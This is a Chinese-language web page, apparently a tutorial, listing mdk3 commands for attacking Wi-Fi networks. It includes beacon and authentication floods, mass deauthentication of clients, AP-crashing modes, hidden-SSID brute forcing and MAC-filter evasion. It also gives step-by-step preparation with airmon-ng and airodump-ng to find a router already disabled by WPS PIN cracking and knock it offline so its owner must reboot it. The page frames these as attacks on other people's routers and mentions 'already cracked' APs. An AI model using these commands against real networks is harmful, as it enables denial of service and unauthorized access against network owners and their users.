当前位置:首页 > 信息技术 > 操作系统 > Linux > mdk3洪水攻击

mdk3洪水攻击

加入MAC地址:sudo mdk3 mon0 b -v /home/yun/custom
虚拟一个客户端:sudo mdk3 mon0 b -n canghaiwuhen
虚拟一个客户端(文件列表):sudo mdk3 mon0 b -f /home/yun/custom
虚拟一个客户端:sudo mdk3 mon0 b -n 路由MAC地址 -c 信道
让路由AP重启/重置:sudo mdk3 mon0 a -a 路由MAC地址
检查客户端是否隐藏并暴力PJ:sudo mdk3 mon0 p -e 路由MAC地址 -c 信道 -t 客户端地址
提走连接路由所有客户端:sudo mdk3 mon0 d -n 路由MAC地址 -c 信道
杀死路由ap:sudo mdk3 mon0 m -t 路由MAC地址
启动最强力攻击:sudo mdk3 mon0 x -n 路由MAC地址 -t 客户端地址 -w 加密类型
迷惑路由密码验证:sud mdk3 mon0 w -e 路由MAC地址 -c 信道
防止MAC地址过滤:sudo mdk3 mon0 f -t 客户端地址 -m 本机MAC地址
测试加密类型有无可能编程wep或不加密:sudo mdk3 mon0 g -t 路由MAC地址

自定义参数有:
-d 显示的热点模式为AD-hoc
-w 显示的热点模式为WEP加密
-g 显示的热点速率为54M
-t 显示的热点模式为WPA-TKIP加密
-a 显示的热点模式为WPA-AES加密

当某个路由器被pin死后,可以用以下洪水攻击方法使其拒绝服务,拒绝服务后路由器将无法连接任何客户端,此时路由器主人只能对其重启!
Linux系统下mdk3洪水攻击准备工作
首先检测网卡:ifconfig -a
然后模拟端口:airmon-ng start wlan0
接下来用:airodump-ng mon0
扫描ap找到你pin死的路由器mac
用mdk3 做身份验证攻击: mdk3 mon0 a -a mac (被pin死的路由器的mac)
身份验证攻击效果说明:
此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。
说明:
此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解。

经测试此功能异常强大,但要慎用,不但会使被攻击的AP死机还会影响到其他可视范围内的AP。搞不好会把其他已经破解的AP都搞瘫痪。

 

mdk3洪水攻击:等您坐沙发呢!

发表评论

表情
还能输入210个字